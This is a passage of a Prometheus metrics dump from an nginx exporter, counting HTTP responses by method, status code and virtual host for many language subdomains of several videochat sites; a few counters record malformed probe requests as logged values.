nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="xh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="NP@H1@&save=Login&submit-url=%2Fadmin%2Flogin.asp&postSecurityFlag=35977",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="400",vhost="-"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="161.97.120.25"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="161.97.120.25:80"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="chm.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="pl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="405",vhost="videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="161.97.120.25"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="3.0.3"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="5.7.31-0ubuntu0.18.04.1"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="af.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="al.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="am.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ar.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="az.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ba.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="be.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="bg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="bn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="bs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ca.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ceb.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="cs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="cy.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="da.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="de.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ee.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="el.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="en.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="eo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="et.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="eu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="fa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="fi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="fr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ga.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="gl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="gu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="he.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="hi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="hr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ht.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="hu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="id.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="is.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="it.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="jp.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="jv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="kk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="km.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="kn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ko.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ky.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="lb.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="lo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="lt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="lv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ml.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mrj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ms.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="my.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ne.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="nl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="no.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="pa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="pap.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="pt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ro.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sco.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="si.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sitemap.xml"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ssh-2.0"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="su.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="sw.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ta.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="te.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="tg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="th.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="tl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="tr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="tt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="udm.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="uk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="ur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="uz.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="vi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="vmi460104.contaboserver.net"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="xh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="yi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="OPTIONS",status="503",vhost="zh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="PATCH",status="302",vhost="videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="161.97.120.25"} 6026 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="af.videochat.world"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="al.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="am.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.cafe"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.tv.br"} 92 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ar.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="az.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ba.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="be.videochat.world"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.date"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.tv.br"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bg.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bn.videochat.world"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.show"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="bs.videochat.world"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ca.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ca.videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ca.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ca.videochat.world"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.tv.br"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ceb.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="chm.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="chm.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="chm.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="chm.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.date"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cs.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="cy.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.date"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.tv.br"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="da.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.cafe"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.tv.br"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="de.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.date"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.tv.br"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ee.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="el.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="en.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="en.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="en.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.tv.br"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eo.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="es.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="es.videochat.date"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="es.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="es.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="et.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.show"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="eu.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.mx"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fa.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.date"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.mx"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.show"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fi.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="fr.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.tv.br"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ga.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gl.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="gu.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.date"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.tv.br"} 